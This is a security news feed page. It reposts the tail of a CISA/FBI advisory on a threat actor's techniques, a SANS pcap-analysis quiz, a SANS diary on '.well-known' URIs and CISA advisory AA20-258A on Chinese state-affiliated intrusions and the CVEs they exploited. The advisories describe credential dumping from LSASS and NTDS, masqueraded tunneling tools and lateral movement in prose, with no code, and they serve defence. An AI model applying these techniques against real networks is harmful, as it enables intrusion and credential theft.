 Masquerading: Masquerade Task or Service The threat actor used FRPC (frpc.exe) daily as reverse proxy, tunneling RDP over TLS. The FRPC (frpc.exe) task name was lpupdate and ran out of Input Method Editor (IME) directory. In other events, the threat actor has been observed hiding activity via ngrok.

T1036.005

 Masquerading: Match Legitimate Name or Location The FRPC (frpc.exe) binary name was svchost, and the configuration file was dllhost.dll, attempting to masquerade as a legitimate Dynamic Link Library.

T1070.004

 Indicator Removal on Host: File Deletion To minimize their footprint, the threat actor ran ./httpd-nscache_clean every 30 minutes, which cleaned up files on the NetScaler device.

Credential Access

CISA observed the threat actor using the techniques identified in table 6 to further their credential access.

Table 6: Credential access techniques

ID

Technique/Sub-Technique

Context

T1003.001

 OS Credential Dumping: LSASS Memory The threat actor used procdump to dump process memory from the Local Security Authority Subsystem Service (LSASS).

T1003.003

 OS Credential Dumping: Windows NT Directory Services (NTDS) The threat actor used Volume Shadow Copy to access credential information from the NTDS file.

T1552.001

 Unsecured Credentials: Credentials in Files The threat actor accessed files containing valid credentials.

T1555

 Credentials from Password Stores The threat actor accessed a KeePass database multiple times and used kee.ps1 PowerShell script.

T1558

 Steal or Forge Kerberos Tickets The threat actor conducted a directory traversal attack by creating files and exfiltrating a Kerberos ticket on a NetScaler device. The threat actor was then able to gain access to a domain account.

Discovery

CISA observed the threat actor using the techniques identified in table 7 to learn more about the victim environments.

Table 7: Discovery techniques

ID

Technique/Sub-Technique

Context

T1018

 Remote System Discovery The threat actor used Angry IP Scanner to detect remote systems.

T1083

 File and Directory Discovery The threat actor used WizTree to obtain network files and directory listings.

T1087

 Account Discovery The threat actor accessed ntuser.dat and UserClass.dat and used Softerra LDAP Browser to browse documentation for service accounts.

T1217

 Browser Bookmark Discovery The threat actor used Google Chrome bookmarks to find internal resources and assets.

Lateral Movement

CISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment.

Table 8: Lateral movement techniques

ID

Technique/Sub-Technique

Context

T1021

 Remote Services The threat actor used RDP with valid account credentials for lateral movement in the environment.

T1021.001

 Remote Services: Remote Desktop Protocol The threat actor used RDP to log in and then conduct lateral movement.

T1021.002

 Remote Services: SMB/Windows Admin Shares The threat actor used PsExec. and PSEXECSVC pervasively on several hosts. The threat actor was also observed using a valid account to access SMB shares.

T1021.004

 Remote Services: SSH The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink were used for encrypted sessions in the system registry hive. 

T1021.005

 Remote Services: Virtual Network Computing (VNC) The threat actor installed TightVNC server and client pervasively on compromised servers and endpoints in the network environment as lateral movement tool.

T1563.002

 Remote Service Session Hijacking: RDP Hijacking The threat actor likely hijacked a legitimate RDP session to move laterally within the network environment.

Collection

CISA observed the threat actor using the techniques identified in table 9 for collection within the victim environment.

Table 9: Collection techniques

ID

Technique/Sub-Technique

Context

T1005

 Data from Local System The threat actor searched local system sources to accessed sensitive documents.

T1039

 Data from Network Shared Drive The threat actor searched network shares to access sensitive documents.

T1213

 Data from Information Repositories The threat actor accessed victim security/IT monitoring environments, Microsoft Teams, etc., to mine valuable information.

T1530

 Data from Cloud Storage Object The threat actor obtained files from the victim cloud storage instances.

T1560.001

 Archive Collected Data: Archive via Utility The threat actor used 7-Zip to archive data.

Command and Control

CISA observed the threat actor using the techniques identified in table 10 for command and control (C2).

Table 10: Command and control techniques

ID

Technique/Sub-Technique

Context

T1071.001

 Application Layer Protocol: Web Protocols The threat actor used various web mechanisms and protocols, including the web shells listed in table 1.

T1105

 Ingress Tool Transfer The threat actor downloaded tools such as PsExec directly to endpoints and downloaded web shells and scripts to NetScaler in base64-encoded schemes.

T1572

 Protocol Tunneling The threat actor used FRPC.exe to tunnel RDP over port 443. The threat actor has also been observed using ngrok for tunneling.

Exfiltration

CISA currently has no evidence of data exfiltration from this threat actor but assesses that it was likely due to the use of 7-Zip and viewing of sensitive documents.

Mitigations

Recommendations

CISA and FBI recommend implementing the following recommendations.

  • If your organization has not patched for the Citrix CVE-2019-19781 vulnerability, and a compromise is suspected, follow the recommendations in CISA Alert AA20-031A.
  • This threat actor has been observed targeting other CVEs mentioned in this report; follow the recommendations in the CISA resources provided below.
  • If using Windows Active Directory and compromise is suspected, conduct remediation of the compromised Windows Active Directory forest.
    • If compromised, rebuild/reimage compromised NetScaler devices.
  • Routinely audit configuration and patch management programs.
  • Monitor network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).
  • Implement multi-factor authentication, especially for privileged accounts.
  • Use separate administrative accounts on separate administration workstations.
  • Implement the principle of least privilege on data access.
  • Secure RDP and other remote access solutions using multifactor authentication and “jump boxes” for access.
  • Deploy endpoint defense tools on all endpoints; ensure they work and are up to date.
  • Keep software up to date.

Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at central@cisa.dhs.gov.

Resources

CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781
CISA Alert AA20-073A: Enterprise VPN Security
CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching
CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902
CISA Security Tip: Securing Network Infrastructure Devices

Revisions

  • September 15, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Security

Traffic Analysis Quiz: Oh No… Another Infection!, (Tue, Sep 15th)

Leave a comment
This post was originally published on this site

Introduction

Today’s diary is another traffic analysis quiz (here’s the previous one) where you try to identify the malware based on a pcap of traffic from an infected Windows host.  Download the pcap for today’s quiz from this page, which also has a JPG image of the alerts list.  Don’t open or review the alerts file yet, because it gives away the answer.

As before, I’ll provide the requirements for this quiz and give some background on the infection.


Shown above:  Screenshot of the pcap for this quiz open in Wireshark.

Requirements

This type of analysis requires Wireshark.  Wireshark is my tool of choice to review packet captures (pcaps) of infection activity.  However, default settings for Wireshark are not optimized for web-based malware traffic.  That’s why I encourage people to customize Wireshark after installing it.  To help, I’ve written a series of tutorials.  The ones most helpful for this quiz are:

Another requirement: use a non-Windows environment like BSD, Linux, or macOS.  Why?  Because this pcap contains HTTP traffic sending Windows-based malware.  If you’re using a Windows host to review the pcap, your antivirus (or Windows Defender) may delete the pcap or malware.  Worst case?  If you extract the malware from the pcap and accidentally run it, you might infect your Windows computer.

As always, beware, because there’s actual malware involved here.

Background on the infection

This infection was caused by a link from an email that returned a Word document.  Unfortunately, I do not have a copy of the email.  The downloaded document has macros designed to infect a vulnerable Windows host.


Shown above:  Link from an email returning a Microsoft Word document.

Here is a link to any.run’s sandbox analysis of a document retrieved from the initial URL.  Normally, I state how this type of malware is ineffective against an up-to-date Windows 10 host running the latest version of Microsoft Office with default security settings.

However, I was able to download the Word document from this link without any warnings from Windows, and I merely had to click twice: once to get past Protected View, and one more time to enable macros.  Tamper Protection and all other security measures were in place, but my Windows 10 lab host still became infected.


Shown above:  After downloading the Word document, I checked it with Microsoft Defender, which said it was okay.


Shown above:  Default security settings still allowed me to click twice and get past two warnings (exit Protected View, then enable macros).


Shown above:  Malware binary retrieved by Word macro was not detected or stopped by Microsoft’s security measures.

This is a good example of how malware authors can evade security measures baked into Windows 10 and Microsoft applications.  Of course, this type of email has to get through the spam and virus filters before this could happen…  I mean, what are the odds?


Shown above:  A recent email that made it past my spam filters to my inbox.

Apparently, if malware distributors send out enough spam, some of it’s bound to reach somebody, somewhere.  This malware is updated often enough, that someone might receive it, click their way through some warnings, and infect their computer.

I guess that’s why we still have a thriving market for security vendors and endpoint protection.

Reviewing the Pcap

I went over some of the basics last time, so I won’t do that here today.  The alerts should let you know what type of malware is involved, and if more than one type of malware is involved.

Final words

As usual, this quiz might not be hard for an experienced malware analyst, but some of you might find this interesting.  The alerts really give this one away.

Again, a pcap of the traffic and a jpeg image showing associated alerts can be found here.


Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security

Not Everything About “.well-known” is Well Known, (Mon, Sep 14th)

Leave a comment
This post was originally published on this site

More than 10 years ago, a first RFC was published describing the “.well-known” directory for web servers. The idea is pretty simple: Provide a standard location for files that are mostly intended for signaling and automatic retrieval. Before the introduction of .well-known, these files often ended up litering the document root, like for example robots.txt being probably the most popular example. Currently, .well-known is defined by RFC8615 [https://tools.ietf.org/html/rfc8615] . 

Over the years, a number of locations were added to .well-known. You can find the authoritative list at IANA [https://www.iana.org/assignments/well-known-uris/well-known-uris.xhtml] and I would like to highlight a few of them here:

  • acme-challenges

This is likely the most “famous” .well-known location. This directory is used by clients speaking the “ACME” protocol to leave challenges as they are retrieving TLS certificates from services like Let’s Encrypt. Your ACME client (e.g. certbot or acme.sh) will drop files in this location. You will not manage these files yourself typically.

  • change-password

Oddly not listed at the IANA site, but already implemented in Safari and some large web sites. This URL will redirect to a page that will allow users to change their password. The feature, at least as implemented in Safari, does not appear terribly useful. Only if you change your password using Safari’s built in password manager (“Keychain”), will you have the option to be redirected to the “change password” page. But this feature is particularly meant for password managers. I played a bit with it, and find it doesn’t work well as you typically need to log in first before changing your password.

  • dnt / dnt-policy.txt

A place to leave a privacy polity (DNT = Do Not Track). There are fairly detailed standards describing how to implemented various policies. There are machine and human readable versions of the policy. This feature was a bit designed around the European GDPR rules.

  • mta-sts.txt

This file describes the STARTTLS policy for a particular domain. A DNS record will alert a mail server that supports the feature of the policy. The policy will describe which mail servers are covered by it, and what encryption to expect. This feature is supposed to reduce the risk of MitM attacks being used to strip the STARTTLS headers.

  • security.txt

A security contact for a particular domain (this is currently a draft, and the URL is not yet listed with IANA). We talked about this in a recent diary. The main goal is to make it easier for researchers to notify a website’s owner of vulnerabilities.

  • sshfp

Lists SSH server fingerprints. This is a bit interesting but also dangerous. You could end up publishing a great resource for attackers by giving them nice fodder for recognizance. But it is also an ongoing issue that it is difficult to distribute public SSH keys for servers, and they are often not verified correctly by users.

So what’s your favorite “.well-known” feature that may not be so well known?

 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security

AA20-258A: Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity

Leave a comment
This post was originally published on this site

Original release date: September 14, 2020

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources and common, well-known tactics, techniques, and procedures (TTPs) to target U.S. Government agencies. CISA has observed these—and other threat actors with varying degrees of skill—routinely using open-source information to plan and execute cyber operations. CISA leveraged the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) and Pre-ATT&CK frameworks to characterize the TTPs used by Chinese MSS-affiliated actors. This product was written by CISA with contributions by the Federal Bureau of Investigation (FBI).

Key Takeaways

  • Chinese MSS-affiliated cyber threat actors use open-source information to plan and conduct cyber operations.
  • Chinese MSS-affiliated cyber threat actors use readily available exploits and exploit toolkits to quickly engage target networks.
  • Maintaining a rigorous patching cycle continues to be the best defense against the most frequently used attacks.
  • If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network.
  • This Advisory identifies some of the more common—yet most effective—TTPs employed by cyber threat actors, including Chinese MSS-affiliated cyber threat actors.

Click here for a PDF version of this report.

Technical Details

Through the operation of the National Cybersecurity Protection System (NCPS) and by fulfilling its mission as the national risk advisor, CISA has observed Chinese MSS-affiliated cyber threat actors operating from the People’s Republic of China using commercially available information sources and open-source exploitation tools to target U.S. Government agency networks.

According to a recent U.S. Department of Justice indictment, MSS-affiliated actors have targeted various industries across the United States and other countries—including high-tech manufacturing; medical device, civil, and industrial engineering; business, educational, and gaming software; solar energy; pharmaceuticals; and defense—in a campaign that lasted over ten years.[1] These hackers acted for both their own personal gain and the benefit of the Chinese MSS.[2]

According to the indictment,

To conceal the theft of information from victim networks and otherwise evade detection, the defendants typically packaged victim data in encrypted Roshal Archive Compressed files (RAR files), changed RAR file and victim documents’ names and extensions (e.g., from “.rar” to “.jpg”) and system timestamps, and concealed programs and documents at innocuous-seeming locations on victim networks and in victim networks’ “recycle bins.” The defendants frequently returned to re-victimize companies, government entities, and organizations from which they had previously stolen data, in some cases years after the initial successful data theft. In several instances, however, the defendants were unsuccessful in this regard, due to the efforts of the FBI and network defenders.

The continued use of open-source tools by Chinese MSS-affiliated cyber threat actors highlights that adversaries can use relatively low-complexity capabilities to identify and exploit target networks. In most cases, cyber operations are successful because misconfigurations and immature patch management programs allow actors to plan and execute attacks using existing vulnerabilities and known exploits. Widespread implementation of robust configuration and patch management programs would greatly increase network security. It would also reduce the speed and frequency of opportunistic attacks by forcing threat actors to dedicate time and funding to research unknown vulnerabilities and develop custom exploitation tools.

MITRE PRE-ATT&CK® Framework for Analysis

In the last 12 months, CISA analysts have routinely observed Chinese MSS-affiliated actors using the following PRE-ATT&CK® Framework TTPs.

Target Selection and Technical Information Gathering

Target Selection [TA0014] is a critical part of cyber operations. While cyber threat actors’ motivations and intents are often unknown, they often make their selections based on the target network’s security posture. Threat actors can use information sources such as Shodan, the Common Vulnerabilities and Exposure (CVE) database, and the National Vulnerabilities Database (NVD).[3][4][5]

  • Shodan is an internet search engine that can be used to identify vulnerable devices connected to the internet. Shodan queries can also be customized to discover specific vulnerabilities on devices, which enables sophisticated cyber threat actors to use relatively unsophisticated techniques to execute opportunistic attacks on susceptible targets.
  • The CVE database and the NVD contain detailed information about vulnerabilities in applications, appliances, and operating systems that can be exploited by cyber threat actors if they remain unpatched. These sources also provide risk assessments if any of the recorded vulnerabilities are successfully exploited.

These information sources have legitimate uses for network defense. CISA analysts are able to identify Federal Government systems that may be susceptible to exploitation attempts by using Shodan, the CVE database, and the NVD to enrich NCPS information. Unlike threat actors, CISA takes the necessary actions to notify network owners of their exposure in order to prevent an impending intrusion or quickly identify intrusions as they occur.

While using these data sources, CISA analysts have observed a correlation between the public release of a vulnerability and targeted scanning of systems identified as being vulnerable. This correlation suggests that cyber threat actors also rely on Shodan, the CVE database, the NVD, and other open-source information to identify targets of opportunity and plan cyber operations. Together, these data sources provide users with the understanding of a specific vulnerability, as well as a list of systems that may be vulnerable to attempted exploits. These information sources therefore contain invaluable information that can lead cyber threat actors to implement highly effective attacks.

CISA has observed Chinese MSS-affiliated actors using the techniques in table 1 to gather technical information to enable cyber operations against Federal Government networks (Technical Information Gathering [TA0015]).

Table 1: Technical information gathering techniques observed by CISA

MITRE ID Name Observation
T1245 Determine Approach/Attack Vector The threat actors narrowed the attack vectors to relatively recent vulnerability disclosures with open-source exploits.
T1247 Acquire Open Source Intelligence (OSINT) Data Sets and Information CISA observed activity from network proxy service Internet Protocol (IP) addresses to three Federal Government webpages. This activity appeared to enable information gathering activities.
T1254 Conduct Active Scanning CISA analysts reviewed the network activity of known threat actor IP addresses and found evidence of reconnaissance activity involving virtual security devices.

Technical Weakness Identification

CISA analysts consistently observe targeting, scanning, and probing of significant vulnerabilities within days of their emergence and disclosure. This targeting, scanning, and probing frequently leads to compromises at the hands of sophisticated cyber threat actors. In some cases, cyber threat actors have used the same vulnerabilities to compromise multiple organizations across many sectors. Organizations do not appear to be mitigating known vulnerabilities as quickly as cyber threat actors are exploiting them. CISA recently released an alert that highlighted the top 10 vulnerabilities routinely exploited by sophisticated foreign cyber threat actors from 2016 to 2019.[6]

Additionally, table 2 provides a list of notable compromises by Chinese MSS-affiliated actors within the past 12 months.

Table 2: Significant CVEs targeted by Chinese MSS-affiliated actors in the last 12 months

Vulnerability Observations
CVE-2020-5902: F5 Big-IP Vulnerability CISA has conducted incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2020-5902. This is a vulnerability in F5’s Big-IP Traffic Management User Interface that allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code.[7]
CVE-2019-19781: Citrix Virtual Private Network (VPN) Appliances CISA has observed the threat actors attempting to discover vulnerable Citrix VPN Appliances. CVE-2019-19781 enabled the actors to execute directory traversal attacks.[8]
CVE-2019-11510: Pulse Secure VPN Servers CISA has conducted multiple incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2019-11510—an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances—to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.[9]
CVE-2020-0688: Microsoft Exchange Server CISA has observed the actors exploiting CVE-2020-0688 for remote code execution to enable email collection of targeted networks.

 

Additionally, CISA has observed Chinese MSS-affiliated actors using the techniques listed in table 3 to identify technical weaknesses in Federal Government networks (Technical Weakness Identification [TA0018]). 

Table 3: Technical weakness identification techniques observed by CISA

MITRE ID Name Observation
T1288 Analyze Architecture and Configuration Posture CISA observed the cyber actors scanning a Federal Government agency for vulnerable web servers. CISA also observed the threat actors scanning for known vulnerable network appliance CVE-2019-11510.
T1291 Research Relevant Vulnerabilities CISA has observed the threat actors scanning and reconnaissance of Federal Government internet-facing systems shortly after the disclosure of significant CVEs.

Build Capabilities 

CISA analysts have observed cyber threat actors using command and control (C2) infrastructure as part of their cyber operations. These observations also provide evidence that threat actors can build and maintain relatively low-complexity capabilities, such as C2, to enable cyber operations against Federal Government networks (Build Capabilities [TA0024]). CISA has observed Chinese MSS-affiliated actors using the build capabilities summarized in table 4.

Table 4: Build capabilities observed by CISA

MITRE ID Name Observation
T1352 C2 Protocol Development CISA observed beaconing from a Federal Government entity to the threat actors’ C2 server.
T1328 Buy Domain Name CISA has observed the use of domains purchased by the threat actors.
T1329 Acquire and / or use of 3rd Party Infrastructure CISA has observed the threat actors using virtual private servers to conduct cyber operations.
T1346 Obtain/Re-use Payloads CISA has observed the threat actors use and reuse existing capabilities.
T1349 Build or Acquire Exploit CISA has observed the threat actors using a variety of open-source and publicly available exploits and exploit code to compromise Federal Government networks.

MITRE ATT&CK Framework for Analysis

CISA has observed sophisticated cyber threat actors, including Chinese MSS-affiliated actors, using commercial and open-source tools to conduct their operations. For example, threat actors often leverage internet software repositories such as GitHub and Exploit-DB.[10][11] Both repositories are commonly used for legitimate development and penetration testing and developing open-source code, but cyber threat actors can also use them to find code to enable nefarious actions.

During incident response activities, CISA frequently observed Chinese government-affiliated actors using the open-source tools outlined in table 5.

Table 5: Common exploit tools CISA observed used by Chinese MSS-affiliated actors

Tool Observations
Cobalt Strike CISA has observed the threat actors using Cobalt Strike to target commercial and Federal Government networks. Cobalt Strike is a commercial penetration testing tool used to conduct red team operations. It contains a number of tools that complement the cyber threat actor’s exploitation efforts, such as a keystroke logger, file injection capability, and network services scanners. CISA observed connections from a Federal Government agency to multiple IP addresses possibly hosting Cobalt Strike team servers.
China Chopper Web Shell CISA has observed the actors successfully deploying China Chopper against organizations’ networks. This open-source tool can be downloaded from internet software repositories such GitHub and Exploit-DB. China Chopper is a web shell hosted on a web server. It is mainly used for web application attacks, and it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords.
Mimikatz CISA has observed the actors using Mimikatz during their operations. This open-source tool is used to capture account credentials and perform privilege escalation with pass-the-hash attacks that allow an attacker to pass captured password hashes and authenticate to network devices.[12]

 

The following sections list the ATT&CK Framework TTPs routinely employed by Chinese government-affiliated actors to conduct cyber operations as observed by CISA analysts.

Initial Access 

In the last 12 months, CISA has observed Chinese MSS-affiliated actors use spearphishing emails with embedded links to actor-owned infrastructure and, in some cases, compromise or poison legitimate sites to enable cyber operations.

CISA has observed the threat actors using the Initial Access [TA0001] techniques identified in table 6.

Table 6: Initial access techniques observed by CISA

MITRE ID Name Observation
T1204.001 User Execution: Malicious Link CISA has observed indications that users have clicked malicious links embedded in spearphishing emails that the threat actors sent
T1566.002 Phishing: Spearphishing Link CISA analyzed network activity of a Federal Government entity and concluded that the threat actors sent a malicious email weaponized with links.
T1190 Exploit Public-Facing Application CISA has observed the actors leveraging CVE-2019-19781 to compromise Citrix Application Delivery Controllers.

 

Cyber threat actors can continue to successfully launch these types of low-complexity attacks—as long as misconfigurations in operational environments and immature patch management programs remain in place—by taking advantage of common vulnerabilities and using readily available exploits and information.

Execution 

CISA analysts continue to observe beaconing activity indicative of compromise or ongoing access to Federal Government networks. This beaconing is a result of cyber threat actors successfully completing cyber operations that are often designed around emergent vulnerabilities and reliant on existing exploitation tools, as mentioned in this document.

CISA has observed Chinese MSS-affiliated actors using the Execution [TA0002] technique identified in table 7.

Table 7: Execution technique observed by CISA

MITRE ID Name Observation
T1072 Software Deployment Tools CISA observed activity from a Federal Government IP address beaconing out to the threat actors’ C2 server, which is usually an indication of compromise.

Credential Access 

Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks. While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals. Further, a threat actor does not require a high degree of competence or sophistication to successfully carry out this kind of opportunistic attack.

CISA has observed Chinese MSS-affiliated actors using the Credential Access [TA0006] techniques highlighted in table 8.

Table 8: Credential access techniques observed by CISA

MITRE ID Name Observation
T1003.001 Operating System (OS) Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory CISA observed the threat actors using Mimikatz in conjunction with coin miner protocols and software. The actors used Mimikatz to dump credentials from the OS using a variety of capabilities resident within the tool.
T1110.004 Brute Force: Credential Stuffing CISA observed what was likely a brute-force attack of a Remote Desktop Protocol on a public-facing server.

Discovery 

As with any cyber operation, cyber threat actors must be able to confirm that their target is online and vulnerable—there are a multitude of open-source scanning and reconnaissance tools available to them to use for this purpose. CISA consistently observes scanning activity across federal agencies that is indicative of discovery techniques. CISA has observed Chinese MSS-affiliated actors scanning Federal Government traffic using the discovery technique highlighted in table 9 (Discovery [TA0007]).

Table 9: Discovery technique observed by CISA

MITRE ID Name Observation
T1046 Network Service Scanning CISA has observed suspicious network scanning activity for various ports at Federal Government entities.

Collection 

Within weeks of public disclosure of CVE-2020-0688, CISA analysts identified traffic that was indicative of Chinese MSS-affiliated threat actors attempting to exploit this vulnerability using the Collection [TA0009] technique listed in table 10.

Table 10: Collection technique observed by CISA

MITRE ID Name Observation
T1114 Email Collection CISA observed the actors targeting CVE-2020-0688 to collect emails from the exchange servers found in Federal Government environments.

Command and Control 

CISA analysts often observe cyber threat actors using external proxy tools or hop points to enable their cyber operations while remaining anonymous. These proxy tools may be commercially available infrastructure as a service (IaaS) or software as a service (SaaS) in the form of a web browser promising anonymity on the internet. For example, “The Onion Router” (Tor) is often used by cyber threat actors for anonymity and C2. Actor’s carefully choose proxy tools depending on their intended use. These techniques are relatively low in complexity and enabled by commercially available tools, yet they are highly effective and often reliant upon existing vulnerabilities and readily available exploits.

CISA has observed Chinese MSS-affiliated actors using the Command and Control [TA0011] techniques listed in table 11.

Table 11: Command and control techniques observed by CISA

MITRE ID Name Observation
T1090.002 Proxy: External Proxy CISA observed activity from a network proxy tool to 221 unique Federal Government agency IP addresses.
T1090.003 Proxy: Multi-hop Proxy CISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems.
T1573.002 Encrypted Channel: Asymmetric Cryptography CISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems.

Mitigations

CISA asserts with high confidence that sophisticated cyber threat actors will continue to use open-source resources and tools to target networks with a low security posture. When sophisticated cyber threat actors conduct operations against soft targets, it can negatively impact critical infrastructure, federal, and state, local, tribal, territorial government networks, possibly resulting in loss of critical data or personally identifiable information.

CISA and the FBI recommend that organizations place an increased priority on patching the vulnerabilities routinely exploited by MSS-affiliated cyber actors. See table 12 for patch information on the CVEs mentioned in this report. For more information on vulnerabilities routinely exploited by sophisticated cyber actors, see CISA Alert: Top 10 Routinely Exploited Vulnerabilities.

Table 12: Patch Information for Vulnerabilities Routinely Exploited by MSS-affiliated Cyber Actors

Vulnerability Vulnerable Products Patch Information
CVE-2020-5902
  • Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)
CVE-2019-19781
  • Citrix Application Delivery Controller
  • Citrix Gateway
  • Citrix SDWAN WANOP
CVE-2019-11510
  • Pulse Connect Secure 9.0R1 – 9.0R3.3, 8.3R1 – 8.3R7, 8.2R1 – 8.2R12, 8.1R1 – 8.1R15
  • Pulse Policy Secure 9.0R1 – 9.0R3.1, 5.4R1 – 5.4R7, 5.3R1 – 5.3R12, 5.2R1 – 5.2R12, 5.1R1 – 5.1R15
CVE-2020-0688
  • Microsoft Exchange Servers

 

CISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats. Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors’ operations and protect organizations’ resources and information systems. 

Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at central@cisa.dhs.gov.

References

Revisions

  • September 14, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.